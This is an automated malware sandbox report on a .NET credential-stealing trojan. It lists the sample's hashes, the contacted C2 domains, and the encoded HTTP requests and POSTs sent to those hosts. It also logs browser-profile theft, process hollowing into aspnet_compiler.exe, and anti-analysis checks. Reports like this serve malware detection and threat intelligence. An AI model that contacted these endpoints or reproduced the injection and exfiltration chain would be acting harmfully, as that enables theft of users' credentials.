Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 6, 2025, 10:14 p.m.	May 6, 2025, 10:21 p.m.

Size	427.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`5b5f6f20e89f4df5fb0b37dc9837cc87`
SHA256	`f0493c04ba1660d2e792bf536f2cb276b773d5d8988f263a662e46194f5365ba`
CRC32	`CADCD914`
ssdeep	`6144:4mKVJcVTbYO2xPO8gxkhu4yxB1d6E2FHSgtIo/V6VyDTzFbvtV1Rf2vf4c9tU+de:YPcTb/8gxcuhogmVKsZx+f43+dPuZ`
PDB Path	C:\Users\VICTOR\Documents\CryptoObfuscator_Output\ffDGGG.pdb
Yara	PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description)

ffDGGG.exe "C:\Users\test22\AppData\Local\Temp\ffDGGG.exe"
2556
- aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  2688
netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
2788
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  3044
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
www.1177win.org	A 104.21.21.142 A 172.67.199.29	104.21.21.142
www.gsis.gr	A 23.50.121.34 A 23.50.121.41 CNAME www.gsis.gr.edgesuite.net CNAME a1954.dscr.akamai.net	23.32.56.147
www.well-prophesied.sbs	A 103.224.182.242	103.224.182.242
www.stakeprompts.xyz	A 13.248.169.48 A 76.223.54.146	13.248.169.48
www.nukbo.top	A 69.57.163.227	69.57.163.227
www.agshealthcare.net	CNAME agshealthcare.net A 84.32.84.32	84.32.84.32
www.fixitdrawer.info	A 3.33.130.190 A 15.197.148.33 CNAME fixitdrawer.info	15.197.148.33
www.e45ht1.top	A 199.180.102.155	199.180.102.155
www.noe300.top	A 103.140.228.162	103.140.228.162
www.pedrovmota.xyz	CNAME pedrovmota.xyz A 147.93.55.147	147.93.55.147
www.textureassets.xyz	A 13.248.169.48 A 76.223.54.146	13.248.169.48
www.sqlite.org	A 194.195.208.62 CNAME sqlite.org	194.195.208.62

IP Address	Status	Action
103.140.228.162	Active	Moloch
103.224.182.242	Active	Moloch
104.21.21.142	Active	Moloch
13.248.169.48	Active	Moloch
147.93.55.147	Active	Moloch
164.124.101.2	Active	Moloch
194.195.208.62	Active	Moloch
199.180.102.155	Active	Moloch
23.50.121.34	Active	Moloch
3.33.130.190	Active	Moloch
69.57.163.227	Active	Moloch
84.32.84.32	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49186 -> 103.140.228.162:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
UDP 192.168.56.101:58297 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 6, 2025, 10:14 p.m.			0	0
IsDebuggerPresent May 6, 2025, 10:14 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (2 events)

Time & API	Arguments	Status	Return	Repeated
CryptExportKey May 6, 2025, 10:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1	0
CryptExportKey May 6, 2025, 10:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1	0

This executable has a PDB path (1 event)

pdb_path

C:\Users\VICTOR\Documents\CryptoObfuscator_Output\ffDGGG.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 6, 2025, 10:14 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (22 events)

request	POST http://www.pedrovmota.xyz/qcy4/
request	GET http://www.pedrovmota.xyz/qcy4/?auHpWf=nHTBc6ayBGRa/pSlbJfiStgmNyV4ae+77TdnGfYfjuOx5fWXKIRsjpkSmGzptaNx+NKwzgmPki0Hn64WoqcL/pwtW1C3EOemFtColwV6Yii9unD3A8G5DXjWm1p/eh0ZlJ8Ouic=&Cr=Yo0-9nrCWd5nl1X4
request	GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3190000.zip
request	POST http://www.gsis.gr/wgkn/
request	GET http://www.gsis.gr/wgkn/?auHpWf=v1GdubO9X83ubizjJpCNXnnHyUiQhxD2jiPDG0Mmg+AfFRK/UpwKxCggA2hYlULaMXFx9fXWCoS2KatWsMNfsbQkSTg6Pkt6H6S7ia00CANLat5cq8SJ975/gCf/o+8nV+/EztI=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.e45ht1.top/31k4/
request	GET http://www.e45ht1.top/31k4/?auHpWf=80MgHWxeVF8HIrHhvCCYnMkubkULOSoow26TNM3qtNk5aY0HYt1Oy94lFKaQRy42FpPj9q0CL7EGfsHd+WNYCk86cephpFrDovVlaWnhxdzCLgCgJMqwjItboIE/dAG0HqAx+E0=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.textureassets.xyz/gcrj/
request	GET http://www.textureassets.xyz/gcrj/?auHpWf=sFP9+QQiYUIOuyYKeY78vDn1tr00fI7Ic5d9cydMX6PvAHJLaZK/JsnsBueybDdvyoBijYPP7+dwJVVaiyNhHv8qouU8cJ1e8ULhTo780jTMr40EFEipUkde7AcyII4g/IwEaRE=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.well-prophesied.sbs/j7zr/
request	GET http://www.well-prophesied.sbs/j7zr/?auHpWf=s+Y3o0QG/6ffKR/H1fTjdmpUOuqDUsjlXSrH09/qbbK34YCOQ8q9lyGlSxMFCRX+rM7IAf0iFQSeE9i9EvmB6308h+X+YZ5or9YoEwF+QNbdU7vus/Ihx8CPxTjKhLyTXVgBb3I=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.1177win.org/72gy/
request	GET http://www.1177win.org/72gy/?auHpWf=ARCeZtY+PpH/SEUCFIj9GZI2i0SuDNBggbqf1cbMXgQY3cKsTREOem5vl9chh1WJruFjqR5QC2JROGkuWrM2lMwz6ySDbliGcQR7Tp2/0OXbDnko+Zju50B5OnmggEWhsZ+FCyw=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.stakeprompts.xyz/oy21/
request	GET http://www.stakeprompts.xyz/oy21/?auHpWf=gwR9yty+A46bHvq9JzSBFuR+4WL6L06z0teJDsITz7d3spxd03Ajj14kBkGs8uMGNvPomsgZH6cY0v+w6n2dSZkJE5ffC7S3Q2C3WvYKZU0JkwG8GAkT+z0W9WQx4blhM3Ts8Zg=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.noe300.top/s9jd/
request	GET http://www.noe300.top/s9jd/?auHpWf=hUSot/YmX3sUrJDF6EXQjhBYB+iNgVNkaMukcuJuwiXfrokiWIfZO7TIQLoGj2j/nsjQxxsop9g7du/hVG1yLZZce6v/7dUM130v6gm2o1CHK93NWhCKbvA9dmlbv7djNwHiqZI=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.nukbo.top/ruia/
request	GET http://www.nukbo.top/ruia/?auHpWf=Lk759KA42nR/k+pD5iBHCIezdbZeGevhvUidM7gi5JNP2WPPPryEh9yNMwh0Q8q0rsLIR7380zjjE/VjjrpCHCBmBg3BRoXKI7f914WdRgRYYUHvwHBxMPdkdjzmgC9/8ZGODyQ=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.agshealthcare.net/q621/
request	GET http://www.agshealthcare.net/q621/?auHpWf=oAs22CAZsdEeo6CdaM1Tgljb68ACYtIaJcLru51nbcrIEtmrpZ1DIq4JGHQTv/EU43fNIkAdexZsm4V8VBtfU53jdDCbrbxWSFShq67gqH7LLxhcHoLPDv/5nKSMeZhOfXAQUnw=&Cr=Yo0-9nrCWd5nl1X4
request	POST http://www.fixitdrawer.info/4a3n/

Sends data using the HTTP POST Method (11 events)

request	POST http://www.pedrovmota.xyz/qcy4/
request	POST http://www.gsis.gr/wgkn/
request	POST http://www.e45ht1.top/31k4/
request	POST http://www.textureassets.xyz/gcrj/
request	POST http://www.well-prophesied.sbs/j7zr/
request	POST http://www.1177win.org/72gy/
request	POST http://www.stakeprompts.xyz/oy21/
request	POST http://www.noe300.top/s9jd/
request	POST http://www.nukbo.top/ruia/
request	POST http://www.agshealthcare.net/q621/
request	POST http://www.fixitdrawer.info/4a3n/

Resolves a suspicious Top Level Domain (TLD) (3 events)

domain	www.noe300.top	description	Generic top level domain TLD
domain	www.e45ht1.top	description	Generic top level domain TLD
domain	www.nukbo.top	description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (30 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00352000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0035a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00731000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00738000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2688 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2788 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 6, 2025, 10:08 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

netbtugc.exe tried to sleep 166 seconds, actually delayed analysis time by 166 seconds

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0006a200', u'virtual_address': u'0x00002000', u'entropy': 7.97000728387356, u'name': u'.text', u'virtual_size': u'0x0006a10c'}

entropy

7.97000728387

description

A section with a high entropy has been found

entropy

0.99531066823

description

Overall entropy of this PE file is high

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2688 region_size: 294912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0	0

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file	C:\Users\test22\AppData\Local\AVG\Browser\User Data

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL` \àj@@.textÔhj ` base_address: 0x00400000 process_identifier: 2688 process_handle: 0x00000248	1	1	0
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2688 process_handle: 0x00000248	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL` \àj@@.textÔhj ` base_address: 0x00400000 process_identifier: 2688 process_handle: 0x00000248	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 called NtSetContextThread to modify thread in remote process 2688
NtSetContextThread May 6, 2025, 10:14 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199440 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 2688	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2688
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2688	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (19 events)

Time & API	Arguments	Status	Return
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2556	1	0
NtGetContextThread May 6, 2025, 10:14 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 6, 2025, 10:14 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2556	1	0
CreateProcessInternalW May 6, 2025, 10:14 p.m.	thread_identifier: 2692 thread_handle: 0x00000244 process_identifier: 2688 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000248	1	1
NtGetContextThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000244	1	0
NtAllocateVirtualMemory May 6, 2025, 10:14 p.m.	process_identifier: 2688 region_size: 294912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL` \àj@@.textÔhj ` base_address: 0x00400000 process_identifier: 2688 process_handle: 0x00000248	1	1
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: base_address: 0x00401000 process_identifier: 2688 process_handle: 0x00000248	1	1
WriteProcessMemory May 6, 2025, 10:14 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2688 process_handle: 0x00000248	1	1
NtSetContextThread May 6, 2025, 10:14 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199440 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 2688	1	0
NtResumeThread May 6, 2025, 10:14 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2688	1	0
NtResumeThread May 6, 2025, 10:15 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2788	1	0
CreateProcessInternalW May 6, 2025, 10:15 p.m.	thread_identifier: 3048 thread_handle: 0x00000410 process_identifier: 3044 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: filepath_r: C:\Program Files\Mozilla Firefox\Firefox.exe stack_pivoted: 0 creation_flags: 12 (CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x0000040c	1	1

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

CAT-QuickHeal	Trojanpws.Msil
Skyhigh	BehavesLike.Win32.Generic.gc
ALYac	Gen:Variant.Marsilia.179183
Cylance	Unsafe
VIPRE	Gen:Variant.Marsilia.179183
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Gen:Variant.Marsilia.179183
K7GW	Trojan ( 005b21231 )
K7AntiVirus	Trojan ( 005b21231 )
Arcabit	Trojan.Marsilia.D2BBEF
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Kryptik.AKUL
APEX	Malicious
Avast	Win32:MalwareX-gen [Spy]
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
Alibaba	TrojanPSW:MSIL/Agensla.8f11f9f1
MicroWorld-eScan	Gen:Variant.Marsilia.179183
Rising	Malware.Obfus/MSIL@AI.98 (RDM.MSIL2:HWfKqLdzJYoETi+fI1PM+g)
Emsisoft	Gen:Variant.Marsilia.179183 (B)
F-Secure	Heuristic.HEUR/AGEN.1326979
McAfeeD	ti!F0493C04BA16
CTX	exe.trojan.msil
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	Win.Trojan.Agenttesla
Google	Detected
Avira	HEUR/AGEN.1326979
Kingsoft	malware.kb.c.980
Gridinsoft	Trojan.Win32.Kryptik.sa
Microsoft	Trojan:Win32/FormBook!rfn
GData	Gen:Variant.Marsilia.179183
Varist	W32/MSIL_Agent.JOU.gen!Eldorado
AhnLab-V3	Trojan/Win.MSILHeracles.C5758216
McAfee	Artemis!5B5F6F20E89F
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Crypt.MSIL.Generic
Ikarus	Trojan-Spy.AgentTesla
TrendMicro-HouseCall	Trojan.Win32.VSX.PE04C9Z
Tencent	Msil.Trojan-QQPass.QQRob.Icnw
huorong	HEUR:Trojan/Cryobf.a
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenericKD.76262849!tr
AVG	Win32:MalwareX-gen [Spy]
alibabacloud	Trojan[stealer]:MSIL/Agensla.gyf

ffDGGG.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All